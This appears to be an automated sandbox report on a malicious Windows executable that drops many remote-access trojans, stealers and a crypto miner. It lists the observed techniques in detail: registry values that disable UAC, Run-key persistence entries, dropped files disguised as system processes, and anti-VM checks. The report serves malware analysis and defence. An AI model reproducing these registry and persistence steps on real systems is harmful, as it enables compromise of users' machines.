Analysis Overview
SHA256
37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
Threat Level: Known bad
The file RIP_YOUR_PC_LOL.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Xmrig family
Purplefox family
HawkEye
DcRat
Asyncrat family
Detect Blackmoon payload
xmrig
Dcrat family
Gh0strat
Hawkeye family
PurpleFox
Nanocore family
Njrat family
UAC bypass
Oski family
Detect PurpleFox Rootkit
Oski
Gh0strat family
Azorult family
Raccoon Stealer V1 payload
njRAT/Bladabindi
Redline family
RedLine
Blackmoon family
Raccoon family
Blackmoon, KrBanker
Fickerstealer family
Raccoon
Process spawned unexpected child process
Fickerstealer
Azorult
Gh0st RAT payload
NanoCore
NirSoft WebBrowserPassView
Async RAT payload
DCRat payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
NirSoft MailPassView
XMRig Miner payload
Detected Nirsoft tools
Sets service image path in registry
Server Software Component: Terminal Services DLL
Modifies Windows Firewall
Drops file in Drivers directory
Drops startup file
Uses the VBS compiler for execution
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Checks whether UAC is enabled
Looks up external IP address via web service
Indicator Removal: File Deletion
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
UPX packed file
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Program crash
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Runs ping.exe
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
System policy modification
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-07 03:49
Signatures
Blackmoon family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nanocore family
Njrat family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-07 03:49
Reported
2024-12-07 03:50
Platform
win7-20241010-en
Max time kernel
24s
Max time network
69s
Command Line
Signatures
AsyncRat
Asyncrat family
Azorult
Azorult family
Blackmoon family
Blackmoon, KrBanker
DcRat
Dcrat family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect PurpleFox Rootkit
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fickerstealer
Fickerstealer family
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
HawkEye
Hawkeye family
NanoCore
Nanocore family
Njrat family
Oski
Oski family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
PurpleFox
Purplefox family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
Redline family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Xmrig family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\QAssist.sys | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\259440504.txt" | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DSL Manager = "C:\\Program Files (x86)\\DSL Manager\\dslmgr.exe" | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aaa = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\es\\aaa.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mediaget = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget\\mediaget.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Program Files\\Windows Portable Devices\\taskhost.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\hh\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mediaget = "\"C:\\PerfLogs\\Admin\\mediaget.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\ini.ini | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File created | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\SysWOW64\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\259440504.txt | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files (x86)\DSL Manager\dslmgr.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\DSL Manager\dslmgr.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\taskhost.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File opened for modification | C:\Program Files\Windows Portable Devices\taskhost.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\f820f26656ae6d1e1cd0ede001693a81e45f4037 | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\b75386f1303e64d8139363b71e44ac16341adf4e | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\aaa.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Cursors\WUDFhosts.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\hh\explorer.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\hh\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\Cursors\KillProcc.sys | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File opened for modification | C:\Windows\Cursors\TrustedInsteller.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\Winlogon.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render.dll | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Help\Winlogon.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Help\Winlogon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\HD____11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\SysWOW64\svchost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
